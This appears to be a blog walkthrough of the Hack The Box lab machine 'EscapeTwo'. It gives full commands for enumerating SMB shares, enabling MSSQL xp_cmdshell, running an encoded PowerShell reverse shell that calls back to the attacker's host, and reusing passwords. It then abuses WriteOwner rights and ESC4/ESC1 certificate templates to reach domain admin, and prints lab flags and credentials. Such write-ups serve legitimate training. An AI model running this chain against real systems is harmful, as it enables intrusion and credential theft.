EscapeTwo
REHAN SAYYED
Machine Information
As is common in real-life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
IP: 10.129.145.201
Let’s start with Nmap scanning,
nmap -sC -sV -o nmap 10.129.145.201
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-15 00:18 EST
Nmap scan report for 10.129.145.201
Host is up (0.29s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-15 05:18:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-15T05:20:04+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-15T05:20:03+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.145.201:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-02-15T05:14:28
|_Not valid after: 2055-02-15T05:14:28
| ms-sql-ntlm-info:
| 10.129.145.201:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-02-15T05:20:04+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-15T05:20:04+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-15T05:20:03+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-15T05:19:24
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.79 seconds
We can see that the system is a Windows Domain Controller, with services like port 88 kerberos, port 389 ldap, port 53 DNS open. We can also see that there’s a Microsoft SQL Server 2019 installed which is running on port 1433. We also found the domain name sequel.htb. So, let’s add that to our host file.
sudo nano /etc/hosts
Now, as we have valid creds provided to us beforehand and SMB ports are open so let’s enumerate shares.
smbmap -H sequel.htb -u rose -p 'KxEPkKe6R8su'
We can see that there’s a Accounting Department share that seems to be interesting let’s use smbclient to enumerate more.
smbclient //sequel.htb/Accounting\ Department -U rose
We can find that there are 2 Excel files present. So, let’s grab this and see if something is interesting we can find.
mget *.xlsx
Checking for file type.
file accounting_2024.xlsx
The files are in zip format let’s unzip it first.
unzip accounting_2024.xlsx
unzip accounts.xlsx
We found lots of files. let’s analyze it one by one.
In the accounts/xl folder, there is a sharedstrings.xml file. After checking its contents, we found some users and their passwords. Interestingly, there is a "sa" user, which is a System Administrator account. We also noticed that the MSSQL port is open, so let's first verify if the account is valid.
nxc mssql sequel.htb -u sa -p 'MSSQLP@ssw0rd!' --local-auth
And the creds are valid. Let’s now use mssqlclient.py and get into the system.
impacket-mssqlclient sequel.htb/sa:'MSSQLP@ssw0rd!'@sequel.htb
As we already are a sysadmin user we can use xp_cmdshell to execute OS commands directly.
EXEC sp_configure 'xp_cmdshell', 1;
It’s not open and we need to configure it manually.
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
Now, let’s try again.
exec xp_cmdshell "whoami"
Let’s now get a reverse shell on our machine.
We first generated a base64 payload now will try to catch a shell.
xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgA5ACIALAA2ADYANQA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
let’s check our Netcat listener.
rlwrap nc -nlvp 6658
Let’s now enumerate this machine.
In the user’s directory, we can see that we have a new user Ryan.
Nothing to be found here. let’s now check the sql_svc folder.
Nothing to be found here either. let’s now move back and check if there are any files present in our folder.
Inside we can find an interesting file named sql-configuration.INI. Let’s list out the contents as there might be any creds we can use.
type sql-configuration.INI
So, we found the password for the service account: WqSZAF6CysDQbGb3. However, what we need is access to the Ryan user. We now have several passwords, so let's create a list and try them on the Ryan user to see if any of them work.
cat pass.txt
nxc winrm sequel.htb -u ryan -p pass.txt
Oh! The password for sql_svc is the same as the password for the Ryan user. Let's access the system via win-rm.
evil-winrm -i sequel.htb -u ryan -p WqSZAF6CysDQbGb3
Let’s now grab our first flag.
type user.txt
Flag: ae106e1d082487fc07aaed597bad9f98
Now, let’s move on to the root. let’s first check if there’s any vulnerable certificate present in the machine.
upload certify.exe
let’s run certipy-ad now.
certipy-ad find -vulnerable -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.129.145.201 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates : [!] Could not find any certificate templates
Nothing to be found here.
Let’s now map the domain using Bloodhound.
bloodhound-python -u ryan -p "WqSZAF6CysDQbGb3" -d sequel.htb -ns 10.129.145.201 -c All
Now let's compress our JSON file into a zip and then let's use Bloodhound to see the data.
mv *.json /home/kali/HTB/boxes/escapetwo/bloodhound
zip -r bloodhound.zip bloodhound
sudo neo4j start
bloodhound
Let’s import our zip file now.
Let’s first mark the user as owned and set it as a starting node.
While checking out the user info we can see that Ryan user has WriteOwner permissions on CA_SVC user.
It means that we can modify the owner of the user. let’s first get the details on the user.
net user ca_svc /domain
So, the user is the part of the Cert Publishers Group. Let’s now change the permissions.
bloodyAD --host 'sequel.htb' -d 'DC01.sequel.htb' -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner 'ca_svc' 'ryan'
Next, we'll set FullControl permissions for ryan, so we can manage the object from this user, including modifying and deleting it.
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"
We'll now use certipy-ad to automatically exploit the shadow account ca_svc.
certipy-ad shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.129.145.201' -target dc01.sequel.htb
And we got the NT hash for the ca_svc account.
With ca_svc hash, we can authenticate to the domain and begin to enumerate ADCS.
certipy-ad find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
There are several escalation techniques. All of them are explained in detail in Certified Pre-Owned. In this case, we have ESC4 (escalation 4). ESC4 occurs when a user has write privileges over a certificate template. This can be exploited to change the template's configuration, making it vulnerable to ESC1. We need to know the DNS name and the Template Name.
let’s now overwrite the configuration to make it vulnerable to ESC1 (ESC4 -> ESC1)
certipy-ad template -u ca_svc -target sequel.htb -template DunderMifflinAuthentication -hashes 3b181b914e7a9d5508ea1e20bc2b7fce:3b181b914e7a9d5508ea1e20bc2b7fce -save-old
The certificate template is now vulnerable to the ESC1 technique. ESC1 occurs when a certificate template allows Client Authentication and lets the user provide any Subject Alternative Name (SAN). Request a certificate using the vulnerable template and specify any UPN.
certipy-ad req -u 'ca_svc@sequel.htb' -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb
Now, let’s get the administrator hash.
certipy-ad auth -pfx administrator.pfx -username Administrator -domain sequel.htb
We now have the NTLM hash for the administrator user. Let's use it to access the system via win-rm.
evil-winrm -i 10.129.145.201 -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
Let’s now get our Root flag.
type root.txt
Flag: 190e46419a3281df92d83e7f12d8ece3
Subscribe to my newsletter
Read articles from REHAN SAYYED directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
REHAN SAYYED
REHAN SAYYED
Passionate cybersecurity enthusiast and red teamer, exploring the depths of offensive security. From secure code reviews to red team operations, I share insights, strategies, and hands-on experiences to help others dive into the world of cyber offense. Join me as I navigate the complexities of cybersecurity on my journey to professional red teaming.